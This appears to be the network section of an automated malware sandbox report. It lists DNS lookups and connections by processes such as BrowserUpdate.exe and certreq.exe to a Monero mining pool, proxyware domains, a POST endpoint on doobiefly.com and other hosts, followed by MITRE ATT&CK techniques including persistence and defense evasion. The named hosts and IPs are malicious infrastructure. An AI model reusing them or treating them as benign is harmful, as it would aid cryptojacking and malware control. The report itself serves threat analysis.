prod-ecsel-o1gfruenxfub-825410333.us-west-2.elb.amazonaws.com

prod-ecsel-o1gfruenxfub-825410333.us-west-2.elb.amazonaws.com

IN A

44.237.49.181
DNS

xmr.2miners.com

Remote address:

8.8.8.8:53

Request

xmr.2miners.com

IN A

Response

xmr.2miners.com

IN A

162.19.139.184
DNS

doobiefly.com

Remote address:

8.8.8.8:53

Request

doobiefly.com

IN A

Response

doobiefly.com

IN A

89.117.9.119
POST

http://doobiefly.com/api/endpoint.php

Remote address:

89.117.9.119:80

Request

POST /api/endpoint.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 259
Content-Type: application/json
Host: doobiefly.com
User-Agent: cpp-httplib/0.9

Response

HTTP/1.1 301 Moved Permanently

Connection: close
content-type: text/html
content-length: 707
date: Thu, 22 Jun 2023 05:42:40 GMT
server: LiteSpeed
location: https://doobiefly.com/api/endpoint.php
platform: hostinger
content-security-policy: upgrade-insecure-requests

141.98.11.18:5351

tls

file.exe

36.0kB
2.0MB
762
1449
141.98.11.18:5351

tls

certreq.exe

60.2kB
4.4kB
72
41
141.98.11.18:5351

tls

certreq.exe

2.4MB
127.6MB
49556
91295
172.67.69.54:443

api.peer2profit.global

tls

BrowserUpdate.exe

1.2kB
3.9kB
9
10
87.251.72.45:443

https

BrowserUpdate.exe

2.0kB
6.0kB
37
68
162.19.176.4:443

fp.check.peer2profit.site

tls

BrowserUpdate.exe

979 B
5.4kB
11
12
87.251.72.45:443

https

BrowserUpdate.exe

7.6kB
1.2kB
16
17
185.125.190.20:443

ubuntu.com

tls

BrowserUpdate.exe

1.2kB
7.5kB
14
12
87.251.72.45:443

https

BrowserUpdate.exe

6.9kB
1.2kB
14
16
208.80.154.224:443

www.wikipedia.org

tls

BrowserUpdate.exe

1.2kB
8.9kB
15
13
87.251.72.45:443

https

BrowserUpdate.exe

8.0kB
1.2kB
14
16
104.244.42.193:443

twitter.com

tls

BrowserUpdate.exe

1.1kB
4.3kB
12
11
87.251.72.45:443

https

BrowserUpdate.exe

4.0kB
1.1kB
11
13
151.101.66.167:443

twitch.tv

tls

BrowserUpdate.exe

987 B
5.7kB
10
11
91.121.63.37:443

fp-1.check.peer2profit.site

tls

BrowserUpdate.exe

1.0kB
5.2kB
10
10
208.80.154.224:443

en.wikipedia.org

tls

BrowserUpdate.exe

1.2kB
7.7kB
13
12
87.251.72.45:443

https

BrowserUpdate.exe

5.9kB
1.0kB
12
12
87.251.72.45:443

https

BrowserUpdate.exe

5.7kB
1.1kB
12
14
87.251.72.45:443

https

BrowserUpdate.exe

5.5kB
1.1kB
12
14
87.251.72.45:443

https

BrowserUpdate.exe

8.0kB
1.2kB
14
16
199.232.150.167:443

www.twitch.tv

tls

BrowserUpdate.exe

1.1kB
5.7kB
10
12
87.251.72.45:443

https

BrowserUpdate.exe

6.0kB
1.2kB
12
14
104.244.42.193:443

twitter.com

tls

BrowserUpdate.exe

1.0kB
4.4kB
11
12
208.80.154.224:443

www.wikipedia.org

tls

BrowserUpdate.exe

1.3kB
8.9kB
15
13
151.101.66.167:443

twitch.tv

tls

BrowserUpdate.exe

1.0kB
5.7kB
11
12
87.251.72.45:443

https

BrowserUpdate.exe

4.0kB
1.0kB
11
13
87.251.72.45:443

https

BrowserUpdate.exe

5.7kB
1.1kB
11
13
87.251.72.45:443

https

BrowserUpdate.exe

5.9kB
1.0kB
12
12
87.251.72.45:443

https

BrowserUpdate.exe

8.2kB
1.1kB
12
14
87.251.72.45:443

https

BrowserUpdate.exe

7.9kB
1.2kB
13
15
162.19.176.4:443

fp.check.peer2profit.site

tls

BrowserUpdate.exe

978 B
5.5kB
11
13
87.251.72.45:443

https

BrowserUpdate.exe

5.8kB
1.1kB
14
16
199.232.150.167:443

www.twitch.tv

tls

BrowserUpdate.exe

1.2kB
6.2kB
14
14
87.251.72.45:443

https

BrowserUpdate.exe

6.0kB
1.2kB
12
14
208.80.154.224:443

en.wikipedia.org

tls

BrowserUpdate.exe

1.2kB
7.7kB
12
12
185.21.103.31:80

http://api.blocklist.de/api.php?ip=154.61.71.13&start=1

http

BrowserUpdate.exe

525 B
1.2kB
6
5

HTTP Request

GET http://api.blocklist.de/api.php?ip=154.61.71.13&start=1

HTTP Response

200
87.251.72.45:443

https

BrowserUpdate.exe

947 B
256 B
6
6
87.251.72.45:443

https

BrowserUpdate.exe

8.0kB
1.2kB
13
15
108.156.60.81:443

otx.alienvault.com

tls

BrowserUpdate.exe

1.2kB
10.0kB
12
15
87.251.72.45:443

https

BrowserUpdate.exe

9.9kB
1.3kB
15
17
91.121.63.37:443

fp-1.check.peer2profit.site

tls

BrowserUpdate.exe

1.0kB
5.2kB
10
10
87.251.72.45:443

https

5.5kB
1.2kB
12
15
185.21.103.31:80

http://api.blocklist.de/api.php?ip=154.61.71.13&start=1

http

535 B
1.2kB
7
5

HTTP Request

GET http://api.blocklist.de/api.php?ip=154.61.71.13&start=1

HTTP Response

200
87.251.72.45:443

https

947 B
256 B
6
6
108.156.60.81:443

otx.alienvault.com

tls

1.1kB
9.6kB
11
13
87.251.72.45:443

https

10.0kB
1.3kB
16
18
44.237.49.181:443

www.threatcrowd.org

tls

774 B
5.9kB
11
12
87.251.72.45:443

https

6.1kB
770 B
11
12
44.237.49.181:443

www.threatcrowd.org

tls

774 B
5.9kB
11
12
87.251.72.45:443

https

6.1kB
770 B
11
12
162.19.139.184:12222

xmr.2miners.com

tls

1.1kB
7.3kB
9
11
89.117.9.119:80

doobiefly.com

98 B
52 B
2
1
89.117.9.119:80

http://doobiefly.com/api/endpoint.php

http

699 B
1.2kB
6
5

HTTP Request

POST http://doobiefly.com/api/endpoint.php

HTTP Response

301
89.117.9.119:443

doobiefly.com

tls

453 B
52 B
3
1

8.8.8.8:53

api.peer2profit.global

dns

BrowserUpdate.exe

68 B
116 B
1
1

DNS Request

api.peer2profit.global

DNS Response

172.67.69.54

104.26.8.6

104.26.9.6
8.8.8.8:53

45.72.251.87.in-addr.arpa

dns

71 B
107 B
1
1

DNS Request

45.72.251.87.in-addr.arpa
8.8.8.8:53

fp.check.peer2profit.site

dns

BrowserUpdate.exe

71 B
87 B
1
1

DNS Request

fp.check.peer2profit.site

DNS Response

162.19.176.4
8.8.8.8:53

ubuntu.com

dns

BrowserUpdate.exe

56 B
104 B
1
1

DNS Request

ubuntu.com

DNS Response

185.125.190.20

185.125.190.21

185.125.190.29
8.8.8.8:53

www.wikipedia.org

dns

BrowserUpdate.exe

63 B
108 B
1
1

DNS Request

www.wikipedia.org

DNS Response

208.80.154.224
8.8.8.8:53

twitter.com

dns

BrowserUpdate.exe

57 B
73 B
1
1

DNS Request

twitter.com

DNS Response

104.244.42.193
8.8.8.8:53

fp-1.check.peer2profit.site

dns

BrowserUpdate.exe

73 B
89 B
1
1

DNS Request

fp-1.check.peer2profit.site

DNS Response

91.121.63.37
8.8.8.8:53

twitch.tv

dns

BrowserUpdate.exe

55 B
119 B
1
1

DNS Request

twitch.tv

DNS Response

151.101.66.167

151.101.2.167

151.101.194.167

151.101.130.167
8.8.8.8:53

en.wikipedia.org

dns

BrowserUpdate.exe

62 B
107 B
1
1

DNS Request

en.wikipedia.org

DNS Response

208.80.154.224
8.8.8.8:53

www.twitch.tv

dns

BrowserUpdate.exe

59 B
110 B
1
1

DNS Request

www.twitch.tv

DNS Response

199.232.150.167
8.8.8.8:53

api.blocklist.de

dns

BrowserUpdate.exe

62 B
78 B
1
1

DNS Request

api.blocklist.de

DNS Response

185.21.103.31
8.8.8.8:53

otx.alienvault.com

dns

BrowserUpdate.exe

64 B
128 B
1
1

DNS Request

otx.alienvault.com

DNS Response

108.156.60.81

108.156.60.87

108.156.60.62

108.156.60.60
8.8.8.8:53

www.threatcrowd.org

dns

65 B
199 B
1
1

DNS Request

www.threatcrowd.org

DNS Response

44.237.49.181
8.8.8.8:53

xmr.2miners.com

dns

61 B
77 B
1
1

DNS Request

xmr.2miners.com

DNS Response

162.19.139.184
8.8.8.8:53

doobiefly.com

dns

59 B
75 B
1
1

DNS Request

doobiefly.com

DNS Response

89.117.9.119

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion